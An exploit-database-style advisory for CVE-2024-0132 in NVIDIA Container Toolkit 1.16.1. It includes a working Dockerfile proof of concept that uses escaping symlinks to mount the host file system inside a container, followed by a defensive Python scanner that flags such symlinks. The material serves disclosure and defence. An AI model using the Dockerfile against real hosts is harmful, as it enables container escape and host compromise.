NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
# Software Link (Homepage): https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Toolkit 1.16.1
# CVE: CVE-2024-0132

Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with the default configuration, where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:

Build and run a Docker image from a Dockerfile like the following:

FROM ubuntu

RUN mkdir -p /usr/local/cuda/compat/

RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1

RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2

The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

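The image above works because a symlink inside the image points above the container's root. A defender reviewing images before they reach a GPU host can look for exactly that pattern. The following scanner is an added example, not part of this advisory or of the PoC repository: it walks an extracted image rootfs (the directory name `rootfs` and the sample layout it builds are constructed for the demo) and reports every symlink whose target, resolved lexically as if the rootfs were `/`, lands outside the rootfs. Resolution is single-hop and lexical, so dangling links are handled and nothing on the real host is followed.

```python
import os
import tempfile
from typing import List, Tuple


def _resolve_inside_root(rootfs: str, link_path: str, target: str) -> str:
    """Lexically resolve a symlink target as if `rootfs` were `/`.

    Absolute targets are re-rooted under rootfs; relative targets are joined
    with the link's own directory. No filesystem access is made, so a
    dangling link resolves just like a live one.
    """
    if os.path.isabs(target):
        candidate = os.path.join(rootfs, target.lstrip("/"))
    else:
        candidate = os.path.join(os.path.dirname(link_path), target)
    # normpath collapses the ".." components; climbing past "/" stays at "/"
    return os.path.normpath(candidate)


def find_escaping_symlinks(rootfs: str) -> List[Tuple[str, str]]:
    """Return (link relative to rootfs, raw target) for every symlink in the
    tree whose resolved target lies outside rootfs."""
    rootfs = os.path.realpath(rootfs)
    escapes = []
    # followlinks=False: symlinked directories are listed but never descended
    for dirpath, dirnames, filenames in os.walk(rootfs, followlinks=False):
        for name in dirnames + filenames:
            link_path = os.path.join(dirpath, name)
            if not os.path.islink(link_path):
                continue
            target = os.readlink(link_path)
            resolved = _resolve_inside_root(rootfs, link_path, target)
            if os.path.commonpath([rootfs, resolved]) != rootfs:
                escapes.append((os.path.relpath(link_path, rootfs), target))
    return sorted(escapes)


def build_sample_rootfs(base: str) -> str:
    """Create a constructed sample rootfs under `base` that mirrors the layout
    in the advisory: one symlink that stays inside the image and one whose
    relative target climbs above the image root."""
    rootfs = os.path.join(base, "rootfs")  # constructed directory name
    os.makedirs(os.path.join(rootfs, "usr/local/cuda/compat"))
    os.makedirs(os.path.join(rootfs, "pwn/libdxcore.so.1337"))
    # In-tree link: absolute target that re-roots under the image
    os.symlink("/pwn/libdxcore.so.1337",
               os.path.join(rootfs, "usr/local/cuda/compat/libxxx.so.1"))
    # Escaping link: enough ".." components to walk above the image root
    os.symlink("../../../../../../../../../",
               os.path.join(rootfs, "pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs"))
    return rootfs


def scan_sample() -> List[Tuple[str, str]]:
    """Build the constructed sample in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_escaping_symlinks(build_sample_rootfs(tmp))


if __name__ == "__main__":
    for link, target in scan_sample():
        print(f"escaping symlink: {link} -> {target}")
```

Run it against an image exported with `docker export` and untarred into a directory (`find_escaping_symlinks("/path/to/rootfs")`); on the sample it flags only the link under /pwn, while the absolute in-tree link to /pwn/libdxcore.so.1337 is correctly left alone. A hit is not proof of exploitation, only a signal that an image contains a link reaching outside its own filesystem, which is the property the toolkit's TOCTOU check failed to catch.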
Regards,
Sergey `*r0binak*` Kanibor